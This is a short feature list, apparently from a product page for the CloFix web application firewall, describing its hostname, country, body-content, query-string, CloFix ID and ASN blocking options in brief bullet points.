Hostname Blocking
Blocks requests based on hostname or domain for virtual host protection.
- Domain-based filtering
- Subdomain blocking
- Referrer validation
- Host header protection
Country Blocking
Blocks traffic from specific countries with granular geo-blocking controls.
- Country-level filtering
- Region-based blocking
- GeoIP database integration
- Allow/block lists
Body Content Blocking
Blocks requests containing specific patterns in request body for deep inspection.
- POST data filtering
- JSON payload inspection
- XML content validation
- Malicious pattern detection
Query Blocking
Blocks requests based on query string parameters and patterns.
- SQL injection detection
- XSS in query params
- Parameter pollution prevention
- Custom query filtering
CloFix ID Blocking
Blocks specific CloFix identification patterns for advanced threat detection.
- ID pattern matching
- Fingerprint validation
- Custom ID blocking
- Anomaly detection
ASN Blocking
Blocks traffic from specific Autonomous System Numbers for network-level control.
- ASN-based filtering
- ISP/network blocking
- Cloud provider filtering
- Bogon ASN prevention